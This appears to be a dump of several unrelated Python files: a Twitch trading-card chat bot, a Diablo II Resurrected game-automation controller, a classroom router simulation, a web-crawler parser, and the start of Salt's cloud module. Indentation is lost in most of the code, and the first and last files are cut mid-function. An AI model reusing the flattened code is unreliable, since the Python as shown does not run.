cur.execute("UPDATE waifus SET base_rarity = %s WHERE id = %s", [rarity, waifu['id']])
cur.execute("SELECT userid, amount FROM has_waifu WHERE waifuid = %s AND rarity < %s", [waifu['id'], rarity])
lowerCopies = cur.fetchall()
if len(lowerCopies) > 0:
cur.execute("DELETE FROM has_waifu WHERE waifuid = %s AND rarity < %s", [waifu['id'], rarity])
for copy in lowerCopies:
giveCard(copy[0], waifu['id'], rarity, copy[1])
attemptPromotions(waifu['id'])
# cancel all bounties
cur.execute(
"SELECT bounties.userid, users.name, bounties.amount FROM bounties JOIN users ON bounties.userid = users.id WHERE bounties.waifuid = %s AND bounties.status = 'open'",
[waifu['id']])
bounties = cur.fetchall()
for bounty in bounties:
addPoints(bounty[0], bounty[2])
self.message('#%s' % bounty[1],
"Your bounty for [%d] %s has been cancelled due to its rarity changing. Your %d points have been refunded." % (
waifu['id'], waifu['name'], bounty[2]), True)
cur.execute(
"UPDATE bounties SET status='cancelled', updated=%s WHERE waifuid = %s AND status='open'",
[current_milli_time(), waifu['id']])
if rarity >= int(config["numNormalRarities"]):
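                # The card is now special: users who had it as their favourite but own no copy are reset to card 1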
cur.execute("UPDATE users SET favourite = 1 WHERE favourite = %s AND (SELECT COUNT(*) FROM has_waifu WHERE has_waifu.userid = users.id AND has_waifu.waifuid = %s) = 0", [waifu['id']] * 2)
# done
self.message(channel, "Successfully changed [%d] %s's base rarity to %s." % (
waifu['id'], waifu['name'], config['rarity%dName' % rarity]), isWhisper)
return
if command == "profile":
if len(args) == 0:
self.message(channel, tags["display-name"] + ", your profile: " + config[
"siteHost"] + "/profile?user=" + str(sender), isWhisper)
return
elif args[0] == "favourite" or args[0] == "favorite":
newFav = 0
try:
newFav = int(args[1])
except ValueError:
self.message(channel, args[1] + " is not a number. Please try again.")
return
newFavW = getWaifuById(newFav)
if newFavW is None:
self.message(channel, "That Waifu doesn't exist! Try again!", isWhisper)
return
canLookup = newFavW["can_lookup"] == 1
hasOrIsLowRarity = False
if int(newFavW["base_rarity"]) > 7:
logger.debug(sender + " requested to set " + str(
newFav) + " as his new Favourite Waifu, which is promo or above. Checking if they have it...")
hand = getHand(tags["user-id"])
for w in hand:
if str(w["id"]) == str(newFav):
hasOrIsLowRarity = True
break
else:
hasOrIsLowRarity = True
if not canLookup and not hasOrIsLowRarity:
self.message(channel, tags[
"display-name"] + ", sorry, but that Waifu doesn't exist. Try a different one!",
isWhisper)
return
elif newFavW["can_favourite"] == 0:
self.message(channel, "%s, sorry, but that Waifu can't be set as your favourite. Try a different one!" % tags['display-name'], isWhisper)
return
elif hasOrIsLowRarity:
self.message(channel, "Updated your favourite Waifu to be " + newFavW["name"] + "! naroDesu",
isWhisper)
setFavourite(tags["user-id"], newFav)
return
else:
self.message(channel, tags[
"display-name"] + ", sorry, but this Waifu is a Special or above, so you need to have it to set it as a favourite!",
isWhisper)
return
elif args[0] == "description":
newDesc = " ".join(args[1:])
logger.debug("New description: " + newDesc)
if len(newDesc) > 1023:
self.message(channel, "That description is too long. Please limit it to 1024 characters.",
isWhisper)
return
setDescription(tags["user-id"], newDesc)
self.message(channel, tags["display-name"] + ", successfully updated your profile description!",
                             isWhisper)
                return
if command == "fixwaifu":
self.message(channel,
"To submit changes/fixes for any waifu, please go to %s/fixes" % config["siteHost"],
isWhisper)
return
if command == "packspending":
packstats = getPackStats(tags["user-id"])
if len(packstats) == 0:
self.message(channel,
"%s, you haven't bought any boosters yet! Buy your first with !booster buy." %
tags['display-name'], isWhisper)
return
totalspending = getSpendings(tags['user-id'])
packstr = ", ".join("%dx %s" % (row[1], row[0]) for row in packstats)
self.message(channel, "%s, you have spent %d total points on the following packs: %s." % (
tags['display-name'], totalspending, packstr), isWhisper)
if checkHandUpgrade(tags["user-id"]):
self.message(channel, "... and this was enough to upgrade your hand to a new slot! naroYay",
isWhisper)
return
if command == "godimage":
canManageImages = sender in superadmins
godRarity = int(config["numNormalRarities"]) - 1
if len(args) < 1:
if canManageImages:
self.message(channel, "Usage: !godimage change / changeglobal / queue / check / acceptsingle / acceptglobal / reject", isWhisper)
else:
self.message(channel, "Usage: !godimage change / changeglobal / list / cancel", isWhisper)
return
subcmd = args[0].lower()
if subcmd in ["change", "changeglobal", "request", "requestglobal"]:
do_global = subcmd in ["changeglobal", "requestglobal"]
if len(args) < 3:
self.message(channel, "Usage: !godimage change[global] <id> <link>", isWhisper)
return
try:
waifuid = int(args[1])
except ValueError:
self.message(channel, "Usage: !godimage change[global] <id> <link>", isWhisper)
return
waifu = getWaifuById(waifuid)
with db.cursor() as cur:
cur.execute("SELECT COUNT(*) FROM has_waifu WHERE userid = %s AND waifuid = %s AND rarity = %s", [tags['user-id'], waifuid, godRarity])
if cur.fetchone()[0] == 0:
self.message(channel, "You don't own that waifu at god rarity!", isWhisper)
return
if waifu["base_rarity"] == godRarity:
self.message(channel, "Base god rarity waifus cannot have their picture changed!", isWhisper)
return
if canManageImages:
# automatically do the change
try:
hostedURL = processImageURL(args[2])
except Exception as ex:
self.message(channel, "Could not process image. %s" % str(ex), isWhisper)
return
if do_global:
cur.execute("UPDATE waifus SET image = %s WHERE id = %s", [hostedURL, waifuid])
else:
cur.execute("UPDATE has_waifu SET custom_image = %s WHERE waifuid = %s AND userid = %s AND rarity = %s", [hostedURL, waifuid, tags['user-id'], godRarity])
# log the change for posterity
insertArgs = [tags['user-id'], waifuid, args[2], do_global, tags['user-id'], current_milli_time()]
cur.execute("INSERT INTO godimage_requests (requesterid, waifuid, image, is_global, state, moderatorid, created) VALUES(%s, %s, %s, %s, 'auto_accepted', %s, %s)", insertArgs)
self.message(channel, "Image change processed successfully.", isWhisper)
return
else:
try:
validateImageURL(args[2])
except ValueError as ex:
self.message(channel, "Invalid link specified. %s" % str(ex), isWhisper)
return
except Exception:
self.message(channel, "There was an unknown problem with the link you specified. Please try again later.", isWhisper)
return
# cancel any old pending requests for this waifu
cur.execute("UPDATE godimage_requests SET state = 'cancelled', updated = %s WHERE waifuid = %s AND state = 'pending'", [current_milli_time(), waifuid])
# record a new request
insertArgs = [tags['user-id'], waifuid, args[2], do_global, current_milli_time()]
cur.execute("INSERT INTO godimage_requests (requesterid, waifuid, image, is_global, state, created) VALUES(%s, %s, %s, %s, 'pending', %s)", insertArgs)
# notify the discordhook of the new request
discordArgs = {"user": tags['display-name'], "id": waifuid, "name": waifu["name"], "image": args[2], "type": "a global" if do_global else "an individual"}
discordbody = {
"username": "WTCG Admin",
"content" : "{user} requested {type} image change for [{id}] {name} to <{image}>!\nUse `!godimage check {id}` in any chat to check it.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Your request has been placed. You will be notified when bot staff accept or decline it.", isWhisper)
return
elif subcmd == "list":
with db.cursor() as cur:
cur.execute("SELECT waifus.id, waifus.name FROM godimage_requests gr JOIN waifus ON gr.waifuid = waifus.id WHERE gr.requesterid = %s AND gr.state = 'pending'", [tags['user-id']])
reqs = cur.fetchall()
if len(reqs) == 0:
self.message(channel, "You don't have any pending god image change requests.", isWhisper)
else:
reqList = ", ".join(["[%d] %s" % (req[0], req[1]) for req in reqs])
self.message(channel, "%s, you have pending image change requests for: %s." % (tags['display-name'], reqList), isWhisper)
return
elif subcmd == "cancel":
if len(args) < 2:
self.message(channel, "Usage: !godimage cancel <id>", isWhisper)
return
try:
waifuid = int(args[1])
except ValueError:
self.message(channel, "Usage: !godimage cancel <id>", isWhisper)
return
waifu = getWaifuById(waifuid)
if waifu is None:
self.message(channel, "Usage: !godimage cancel <id>", isWhisper)
return
with db.cursor() as cur:
cur.execute("UPDATE godimage_requests SET state = 'cancelled', updated = %s WHERE requesterid = %s AND waifuid = %s AND state = 'pending'", [current_milli_time(), tags['user-id'], waifuid])
if cur.rowcount > 0:
# send discord notif
discordArgs = {"user": tags['display-name'], "id": waifuid, "name": waifu["name"]}
discordbody = {
"username": "WTCG Admin",
"content" : "{user} cancelled their image change request for [{id}] {name}.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "You cancelled your image change request for [%d] %s." % (waifuid, waifu["name"]), isWhisper)
elif waifu["can_lookup"]:
self.message(channel, "You didn't have a pending image change request for that waifu.", isWhisper)
else:
self.message(channel, "Usage: !godimage cancel <id>", isWhisper)
return
elif subcmd == "queue" and canManageImages:
with db.cursor() as cur:
cur.execute("SELECT waifuid FROM godimage_requests WHERE state = 'pending' ORDER BY created ASC")
queue = cur.fetchall()
if len(queue) == 0:
self.message(channel, "The request queue is currently empty.", isWhisper)
else:
queueStr = ", ".join(str(item[0]) for item in queue)
self.message(channel, "Current requested IDs for image changes: %s. !godimage check <id> to see each request." % queueStr, isWhisper)
return
elif canManageImages and subcmd in ["check", "acceptsingle", "acceptglobal", "reject"]:
if len(args) < 2:
self.message(channel, "Usage: !godimage %s <id>" % subcmd, isWhisper)
return
try:
waifuid = int(args[1])
except ValueError:
self.message(channel, "Usage: !godimage %s <id>" % subcmd, isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT gr.id, gr.image, gr.is_global, users.id, users.name, waifus.id, waifus.name FROM godimage_requests gr"
+ " JOIN users ON gr.requesterid = users.id"
+ " JOIN waifus ON gr.waifuid = waifus.id"
+ " WHERE gr.waifuid = %s AND gr.state = 'pending'", [waifuid])
request = cur.fetchone()
if request is None:
self.message(channel, "There is no pending request for that waifu.", isWhisper)
return
if subcmd == "check":
msgArgs = {"user": request[4], "id": request[5], "name": request[6], "image": request[1]}
if request[2]:
self.message(channel, ("{user} requested [{id}] {name}'s global image to be changed to {image} ." +
" You can accept this request with !godimage acceptglobal {id}," +
" change it for only their copy with !godimage acceptsingle {id}," +
" or deny it entirely with !godimage reject {id} <reason>.").format(**msgArgs), isWhisper)
else:
self.message(channel, ("{user} requested their copy of [{id}] {name}'s image to be changed to {image} ." +
" You can accept this request with !godimage acceptsingle {id}" +
" or deny it with !godimage reject {id} <reason>.").format(**msgArgs), isWhisper)
elif subcmd == "reject":
if len(args) < 3:
self.message(channel, "You must provide a reason to reject the request. If it is porn/illegal/etc, just ban the user.", isWhisper)
return
rejectionReason = " ".join(args[2:])
queryArgs = [tags['user-id'], current_milli_time(), rejectionReason, request[0]]
cur.execute("UPDATE godimage_requests SET state = 'rejected', moderatorid = %s, updated = %s, rejection_reason = %s WHERE id = %s", queryArgs)
# notify them
self.message("#%s" % request[4], "Your image change request for [%d] %s was rejected with the following reason: %s" % (request[5], request[6], rejectionReason), True)
self.message(channel, "Request rejected and user notified.", isWhisper)
elif subcmd == "acceptglobal":
if not request[2]:
self.message(channel, "A non-global request cannot be accepted for a global image change. Use !godimage acceptsingle %d instead." % request[5], isWhisper)
return
# update it
try:
hostedURL = processImageURL(request[1])
except Exception as ex:
self.message(channel, "Could not process image. %s. Check the URL yourself and if it is invalid reject their request." % str(ex), isWhisper)
return
cur.execute("UPDATE waifus SET image = %s WHERE id = %s", [hostedURL, request[5]])
cur.execute("UPDATE has_waifu SET custom_image = NULL WHERE waifuid = %s", [request[5]])
queryArgs = [tags['user-id'], current_milli_time(), request[0]]
cur.execute("UPDATE godimage_requests SET state = 'accepted_global', moderatorid = %s, updated = %s WHERE id = %s", queryArgs)
# notify them
self.message("#%s" % request[4], "Your global image change request for [%d] %s was accepted, the image has been changed." % (request[5], request[6]), True)
self.message(channel, "Request accepted. The new image for [%d] %s is %s" % (request[5], request[6], hostedURL), isWhisper)
else:
# update it
try:
hostedURL = processImageURL(request[1])
except Exception as ex:
self.message(channel, "Could not process image. %s. Check the URL yourself and if it is invalid reject their request." % str(ex), isWhisper)
return
cur.execute("UPDATE has_waifu SET custom_image = %s WHERE userid = %s AND waifuid = %s AND rarity = %s", [hostedURL, request[3], request[5], godRarity])
queryArgs = [tags['user-id'], current_milli_time(), request[0]]
cur.execute("UPDATE godimage_requests SET state = 'accepted_single', moderatorid = %s, updated = %s WHERE id = %s", queryArgs)
# notify them
if request[2]:
self.message("#%s" % request[4], "Your image change request for [%d] %s was accepted, but only for your own copy." % (request[5], request[6]), True)
else:
self.message("#%s" % request[4], "Your image change request for your copy of [%d] %s was accepted." % (request[5], request[6]), True)
self.message(channel, "Request accepted. The new image for %s's copy of [%d] %s is %s" % (request[4], request[5], request[6], hostedURL), isWhisper)
return
if command == "tokenpromo" or command == "tokenpromos":
self.message(channel, "Token Promo purchases are closed for this year, thanks for playing!", isWhisper)
return
if command == "tokengacha":
self.message(channel, "The Token Gacha is closed for this year, thanks for playing!", isWhisper)
return
if command == "autogacha" and sender in superadmins:
tokenName = config["eventTokenName"]
with db.cursor() as cur:
cur.execute("SELECT id, name, eventTokens FROM users WHERE eventTokens > 0 ORDER BY eventTokens DESC")
holders = cur.fetchall()
for holder in holders:
fullPrizes = []
userid = int(holder[0])
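                    # Roll the gacha once for every leftover event token this user still holds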
for i in range(int(holder[2])):
roll = tokenGachaRoll()
prizes = []
if "pack" in roll["prize"]:
giveFreeBooster(userid, roll["prize"]["pack"], roll["prize"]["amount"])
prizes.append("%dx %s pack (!freepacks open %s)" % (roll["prize"]["amount"], roll["prize"]["pack"], roll["prize"]["pack"]))
if "points" in roll["prize"]:
addPoints(userid, roll["prize"]["points"])
prizes.append("%d points" % roll["prize"]["points"])
if "pudding" in roll["prize"]:
addPudding(userid, roll["prize"]["pudding"])
prizes.append("%d pudding" % roll["prize"]["pudding"])
fullPrizes.append("[%d◆] %s" % (roll["tier"], " and ".join(prizes)))
messages = ["Your %d leftover %s(s) were fed into the Token Gacha and you got: " % (holder[2], tokenName)]
first = True
for prizeStr in fullPrizes:
if len(messages[-1]) + len(prizeStr) > 398:
messages.append(prizeStr)
elif first:
messages[-1] += prizeStr
else:
messages[-1] += ", " + prizeStr
first = False
for message in messages:
self.message('#' + holder[1], message, True)
cur.execute("UPDATE users SET eventTokens = 0")
self.message(channel, "Done.", isWhisper)
return
class MarathonBot(pydle.Client):
instance = None
pw=None
def __init__(self):
super().__init__(config["marathonChannel"][1:])
MarathonBot.instance = self
self.ffz = MarathonFFZWebsocket(config["marathonChannel"][1:])
def start(self, password):
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=password)
self.pw = password
logger.info("Connecting MarathonBot...")
def on_disconnect(self, expected):
logger.warning("MarathonBot Disconnected, reconnecting....")
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=self.pw, reconnect=True)
def on_connect(self):
super().on_connect()
logger.info("MarathonBot Joining")
def on_message(self, source, target, message):
logger.debug("message on MarathonBot: %s, %s, %s", str(source), str(target), message)
def updateFollowButtons(self, channels):
if self.ffz is None:
self.ffz = MarathonFFZWebsocket(config["marathonChannel"][1:], channels)
else:
self.ffz.updateFollowButtons(channels)
def message(self, *args):
logger.info("MarathonBot Sending "+str(args))
super().message(*args)
class MarathonFFZWebsocket:
def __init__(self, channelName, newFollowButtons=None):
self.channelName = channelName
self.messageNumber = 0
self.queuedChanges = []
self.initDone = False
if newFollowButtons is not None:
self.queuedChanges.append(newFollowButtons)
        self.ws = websocket.WebSocketApp(ffzws, on_message=self.on_message, on_error=self.on_error, on_close=self.on_close)
self.ws.on_open = self.on_open
thread.start_new_thread(self.ws.run_forever, (), {"origin": ""})
def sendMessage(self, message):
self.messageNumber += 1
self.ws.send("%d %s" % (self.messageNumber, message))
def on_open(self):
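        # FFZ handshake: send hello on open; setuser, the two subs and ready follow one at a time as each reply is acked in on_message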
self.sendMessage('hello ["waifutcg-ffzclient",false]')
def on_message(self, message):
logger.debug("Websocket recv: "+message)
code, msg = message.split(" ", 1)
code = int(code)
if code == -1:
# probably authorize
if msg.startswith("do_authorize"):
# must send auth code
authCode = json.loads(msg[13:])
logger.debug("trying to authenticate with FFZ "+authCode)
MarathonBot.instance.message("#frankerfacezauthorizer", "AUTH "+authCode)
elif code == self.messageNumber and self.messageNumber < 5 and msg.split(" ")[0] == "ok":
# send the rest of the intro
if self.messageNumber == 1:
self.sendMessage('setuser %s' % json.dumps(self.channelName))
elif self.messageNumber == 2:
self.sendMessage('sub %s' % json.dumps('room.'+self.channelName))
elif self.messageNumber == 3:
self.sendMessage('sub %s' % json.dumps('channel.'+self.channelName))
else:
self.sendMessage('ready 0')
elif code >= 5 and self.messageNumber >= 5 and len(self.queuedChanges) > 0:
self.initDone = True
self.updateFollowButtons(self.queuedChanges[0])
self.queuedChanges = self.queuedChanges[1:]
elif code >= 5 and self.messageNumber >= 5 and msg.split(" ")[0] == "ok":
self.initDone = True
else:
# don't do anything immediately
pass
def on_error(self, error):
logger.debug("WS Error: "+error)
self.ws.close()
def on_close(self):
logger.debug("Websocket closed")
MarathonBot.instance.ffz = None
def updateFollowButtons(self, channels):
if not self.initDone:
self.queuedChanges.append(channels)
else:
self.sendMessage("update_follow_buttons %s" % json.dumps([self.channelName, channels]))
curg = db.cursor()
logger.info("Fetching channel list...")
curg.execute("SELECT name FROM channels")
channels = []
for row in curg.fetchall():
channels.append("#" + row[0])
logger.debug("Channels: %s", str(channels))
curg.close()
loadConfig()
# twitch api init
checkAndRenewAppAccessToken()
# get user data for the bot itself
headers = {"Authorization": "Bearer %s" % config["appAccessToken"]}
r = requests.get("https://api.twitch.tv/helix/users", headers=headers,
params={"login": str(config["username"]).lower()})
j = r.json()
try:
twitchid = j["data"][0]["id"]
except Exception:
twitchid = 0
config["twitchid"] = str(twitchid)
b = NepBot(config, channels)
b.start(config["oauth"])
# marathon bot?
if booleanConfig("marathonBotFunctions"):
maraBot = MarathonBot()
maraBot.start(config["marathonOAuth"])
logger.debug("past start")
pool.handle_forever()
|
game_controller.py
|
import os
import threading
import time
import cv2
from template_finder import TemplateFinder
from utils.auto_settings import check_settings
from bot import Bot
from config import Config
from death_manager import DeathManager
from game_recovery import GameRecovery
from game_stats import GameStats
from health_manager import HealthManager
from logger import Logger
from messenger import Messenger
from screen import Screen
from ui.char_selector import CharSelector
from utils.misc import kill_thread, set_d2r_always_on_top, restore_d2r_window_visibility
from utils.restart import restart_game
class GameController:
is_running = False
def __init__(self, config: Config):
self._config = config
self.screen = None
self.template_finder = None
self.health_monitor_thread = None
self.health_manager = None
self.death_manager = None
self.death_monitor_thread = None
self.game_recovery = None
self.game_stats = None
self.game_controller_thread = None
self.bot_thread = None
self.bot = None
self.char_selector = None
def run_bot(self, pick_corpse: bool = False):
if self._config.general['restart_d2r_when_stuck']:
# Make sure the correct char is selected
if self.char_selector.has_char_template_saved():
Logger.info("Selecting original char")
self.char_selector.select_char()
else:
Logger.info("Saving top-most char as template")
self.char_selector.save_char_template()
# Start bot thread
self.bot = Bot(self.screen, self.game_stats, self.template_finder, pick_corpse)
self.bot_thread = threading.Thread(target=self.bot.start)
self.bot_thread.daemon = True
self.bot_thread.start()
# Register that thread to the death and health manager so they can stop the bot thread if needed
self.death_manager.set_callback(lambda: self.bot.stop() or kill_thread(self.bot_thread))
self.health_manager.set_callback(lambda: self.bot.stop() or kill_thread(self.bot_thread))
self.health_manager.set_belt_manager(self.bot.get_belt_manager())
do_restart = False
messenger = Messenger()
        while True:
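            # Supervision loop: feed the bot's position to the health manager and watch for death, chicken, or max game length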
self.health_manager.update_location(self.bot.get_curr_location())
max_game_length_reached = self.game_stats.get_current_game_length() > self._config.general["max_game_length_s"]
if max_game_length_reached or self.death_manager.died() or self.health_manager.did_chicken():
# Some debug and logging
if max_game_length_reached:
Logger.info(f"Max game length reached. Attempting to restart {self._config.general['name']}!")
if self._config.general["info_screenshots"]:
cv2.imwrite("./info_screenshots/info_max_game_length_reached_" + time.strftime("%Y%m%d_%H%M%S") + ".png", self.screen.grab())
elif self.death_manager.died():
self.game_stats.log_death(self.death_manager._last_death_screenshot)
elif self.health_manager.did_chicken():
self.game_stats.log_chicken(self.health_manager._last_chicken_screenshot)
self.bot.stop()
kill_thread(self.bot_thread)
# Try to recover from whatever situation we are in and go back to hero selection
do_restart = self.game_recovery.go_to_hero_selection()
break
time.sleep(0.5)
self.bot_thread.join()
if do_restart:
# Reset flags before running a new bot
self.death_manager.reset_death_flag()
self.health_manager.reset_chicken_flag()
self.game_stats.log_end_game(failed=max_game_length_reached)
return self.run_bot(True)
else:
if self._config.general["info_screenshots"]:
cv2.imwrite("./info_screenshots/info_could_not_recover_" + time.strftime("%Y%m%d_%H%M%S") + ".png", self.screen.grab())
if self._config.general['restart_d2r_when_stuck']:
Logger.error("Could not recover from a max game length violation. Restarting the Game.")
if self._config.general["custom_message_hook"]:
messenger.send_message("Got stuck and will now restart D2R")
if restart_game(self._config.general["d2r_path"]):
self.game_stats.log_end_game(failed=max_game_length_reached)
if self.setup_screen():
self.start_health_manager_thread()
self.start_death_manager_thread()
self.game_recovery = GameRecovery(self.screen, self.death_manager, self.template_finder)
return self.run_bot(True)
Logger.error("Could not restart the game. Quitting.")
messenger.send_message("Got stuck and could not restart the game. Quitting.")
else:
Logger.error("Could not recover from a max game length violation. Quitting botty.")
if self._config.general["custom_message_hook"]:
messenger.send_message("Got stuck and will now quit botty")
os._exit(1)
def start(self):
# Check if the user should update the D2R settings
diff = check_settings(self._config)
if len(diff) > 0:
Logger.warning("Your D2R settings differ from the requiered ones. Please use Auto Settings to adjust them. The differences are:")
Logger.warning(f"{diff}")
if self._config.advanced_options['d2r_windows_always_on_top']:
set_d2r_always_on_top()
self.setup_screen()
self.template_finder = TemplateFinder(self.screen)
self.start_health_manager_thread()
self.start_death_manager_thread()
self.game_recovery = GameRecovery(self.screen, self.death_manager, self.template_finder)
self.game_stats = GameStats()
self.char_selector = CharSelector(self.screen, self._config, self.template_finder)
self.start_game_controller_thread()
GameController.is_running = True
def stop(self):
if self._config.advanced_options['d2r_windows_always_on_top']:
restore_d2r_window_visibility()
if self.death_monitor_thread: kill_thread(self.death_monitor_thread)
if self.health_monitor_thread: kill_thread(self.health_monitor_thread)
if self.bot_thread: kill_thread(self.bot_thread)
if self.game_controller_thread: kill_thread(self.game_controller_thread)
GameController.is_running = False
def setup_screen(self):
self.screen = Screen(self._config.general["monitor"])
if self.screen.found_offsets:
return True
return False
def start_health_manager_thread(self):
# Run health monitor thread
self.health_manager = HealthManager(self.screen, self.template_finder)
self.health_monitor_thread = threading.Thread(target=self.health_manager.start_monitor)
self.health_monitor_thread.daemon = True
self.health_monitor_thread.start()
def start_death_manager_thread(self):
# Run death monitor thread
self.death_manager = DeathManager(self.screen, self.template_finder)
self.death_monitor_thread = threading.Thread(target=self.death_manager.start_monitor)
self.death_monitor_thread.daemon = True
self.death_monitor_thread.start()
def start_game_controller_thread(self):
# Run game controller thread
self.game_controller_thread = threading.Thread(target=self.run_bot)
self.game_controller_thread.daemon = False
self.game_controller_thread.start()
def toggle_pause_bot(self):
if self.bot: self.bot.toggle_pause()
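# --- Editorial sketch (not part of the original module) ---
# How the pieces above fit together, inferred from start() and run_bot():
# start() sets up the Screen and TemplateFinder, spawns the health and death
# monitor threads, and launches run_bot() on the game controller thread.
# run_bot() starts the Bot on its own thread, registers kill callbacks with the
# health/death managers, and loops; on a chicken, death, or max game length
# violation it kills the bot thread, lets GameRecovery return to hero selection,
# and restarts the run with pick_corpse=True. A minimal driver (assuming a valid
# Config) might look like:
#
#     controller = GameController(Config())
#     controller.start()              # spawns monitor, controller and bot threads
#     ...                             # hotkeys call toggle_pause_bot() / stop()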
|
simulation_3.py
|
'''
Created on Oct 12, 2016
@author: mwittie
'''
# modified by Keely Wiesbeck and Alex Harry
import network_3
import link_3
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 # 0 means unlimited
simulation_time = 10 # give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] # keeps track of objects, so we can kill their threads
# create network nodes
host_1 = network_3.Host(1)
object_L.append(host_1)
host_2 = network_3.Host(2)
object_L.append(host_2)
# Routing tables map a destination host to the router's out interface:
# {destination host id: out interface}. Each table is created here and passed
# into its router. For router A, traffic for host 3 leaves via out interface 0
# (toward router B) and traffic for host 4 via out interface 1 (toward router C);
# see the topology summary after the link definitions below.
routing_table_a = {3: 0, 4: 1}
router_a = network_3.Router(routing_table_a, name='A', intf_count=2, max_queue_size=router_queue_size)
object_L.append(router_a)
routing_table_b = {3: 0, 4: 0}
router_b = network_3.Router(routing_table_b, name='B', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_b)
routing_table_c = {3: 0, 4: 0}
router_c = network_3.Router(routing_table_c, name='C', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_c)
routing_table_d = {3: 0, 4: 1}
router_d = network_3.Router(routing_table_d, name='D', intf_count=2, max_queue_size=router_queue_size)
object_L.append(router_d)
host_3 = network_3.Host(3)
object_L.append(host_3)
host_4 = network_3.Host(4)
object_L.append(host_4)
# create a Link Layer to keep track of links between network nodes
link_layer = link_3.LinkLayer()
object_L.append(link_layer)
# add all the links
# link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
# out interface of client, in interface of server
# 50 is the MTU - largest size of packet that can be transferred over links
link_layer.add_link(link_3.Link(host_1, 0, router_a, 0, 50))
link_layer.add_link(link_3.Link(host_2, 0, router_a, 1, 50))
link_layer.add_link(link_3.Link(router_a, 0, router_b, 0, 50))
link_layer.add_link(link_3.Link(router_a, 1, router_c, 0, 50))
link_layer.add_link(link_3.Link(router_b, 0, router_d, 0, 50))
link_layer.add_link(link_3.Link(router_c, 0, router_d, 1, 50))
link_layer.add_link(link_3.Link(router_d, 0, host_3, 0, 50))
link_layer.add_link(link_3.Link(router_d, 1, host_4, 0, 50))
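# Editorial note: the resulting topology, read from the links above, is
#   host_1 -> (A in 0)   host_2 -> (A in 1)
#   A out 0 -> B, A out 1 -> C, B out 0 -> (D in 0), C out 0 -> (D in 1)
#   D out 0 -> host_3, D out 1 -> host_4
# so routing_table_a = {3: 0, 4: 1} sends host-3 traffic through B and
# host-4 traffic through C, and router D delivers to the destination host.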
# start all the objects
thread_L = []
thread_L.append(threading.Thread(name=host_1.__str__(), target=host_1.run))
thread_L.append(threading.Thread(name=host_2.__str__(), target=host_2.run))
thread_L.append(threading.Thread(name=host_3.__str__(), target=host_3.run))
thread_L.append(threading.Thread(name=host_4.__str__(), target=host_4.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name=router_b.__str__(), target=router_b.run))
thread_L.append(threading.Thread(name=router_c.__str__(), target=router_c.run))
thread_L.append(threading.Thread(name=router_d.__str__(), target=router_d.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
# create some send events
# host 1 to host 3
# host 2 to host 4
for i in range(3):
message = 'this is data message %d' % i
# if statement to change which host to send to (host 3 or host 4)
if i == 0 or i == 2:
host_1.udt_send(3, message)
print("Destination host: 3")
else:
host_2.udt_send(4, message)
print("Destination host: 4")
# give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
# join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
parser.py
|
import os
import re
import urllib
from threading import Thread
from urllib import parse
from myqueue.Context import Context
from myqueue.contentqueue import ContentQueue
from myqueue.savequeue import SaveQueue
from concurrent.futures import ThreadPoolExecutor
from myqueue.urlqueue import UrlQueue
import copy
class parser:
"""
This class parses fetched page content to extract links or article content.
"""
def __init__(self):
self.url_queue = UrlQueue()
self.content_queue = ContentQueue()
self.save_queue = SaveQueue()
self.kernal = None
def _get_item_from_content(self):
return self.content_queue.move()
def _add_item_to_content(self, context):
self.content_queue.add(context)
def _add_item_from_save(self, context):
self.save_queue.add(context)
def active(self, kernel):
"""
Register the extraction kernel used by parse().
:param kernel: object exposing LinkExtract() and ContentExtract()
:return: None
"""
self.kernal = kernel
def parse(self):
"""
Consume items from the content queue and spawn link/content extraction threads.
:return: None (runs until interrupted)
"""
def LinkWrap(context):
url = context.url
content = context.content
url_list = self.kernal.LinkExtract(content)
self.url_queue.add_all([Context(url=u, pre_url=url) for u in url_list])
def ContentWrap(context):
url = context.url
content = context.content
content_list = self.kernal.ContentExtract(content)
for c in content_list:
self.save_queue.add(Context(url=url, content=c[2], time=c[1], title=c[0]))
while True:
try:
content = self._get_item_from_content()
except IndexError:
continue
# LinkWrap(content)
# ContentWrap(content)
link = Thread(target=LinkWrap, args=(content, ))
con = Thread(target=ContentWrap, args=(content, ))
link.start()
con.start()
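# --- Editorial usage sketch (an assumption, not part of the original module) ---
# parse() expects the kernel registered via active() to expose
# LinkExtract(content) -> iterable of urls and ContentExtract(content) ->
# iterable of (title, time, body) tuples; that contract is inferred from the
# LinkWrap/ContentWrap helpers above. A hypothetical wiring:
def _example_parser_wiring(kernel):
    p = parser()
    p.active(kernel)                    # register the extraction kernel
    worker = Thread(target=p.parse)     # parse() loops forever draining the content queue
    worker.daemon = True
    worker.start()
    return p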
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
The top level interface used to translate configuration data back to the
correct cloud modules
"""
# Import python libs
from __future__ import absolute_import, generators, print_function, unicode_literals
import copy
import glob
import logging
import multiprocessing
import os
import signal
import sys
import time
import traceback
from itertools import groupby
import salt.client
# Import salt libs
import salt.config
import salt.loader
import salt.syspaths
import salt.utils.args
import salt.utils.cloud
import salt.utils.context
import salt.utils.crypt
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.files
import salt.utils.user
import salt.utils.verify
import salt.utils.yaml
# Import salt.cloud libs
from salt.exceptions import (
SaltCloudConfigError,
SaltCloudException,
SaltCloudNotFound,
SaltCloudSystemExit,
)
from salt.ext import six
from salt.ext.six.moves import input # pylint: disable=import-error,redefined-builtin
from salt.template import compile_template
# Import third party libs
try:
import Cryptodome.Random
except ImportError:
try:
import Crypto.Random
except ImportError:
pass # pycrypto < 2.1
# Get logging started
log = logging.getLogger(__name__)
def communicator(func):
"""Warning, this is a picklable decorator !"""
def _call(queue, args, kwargs):
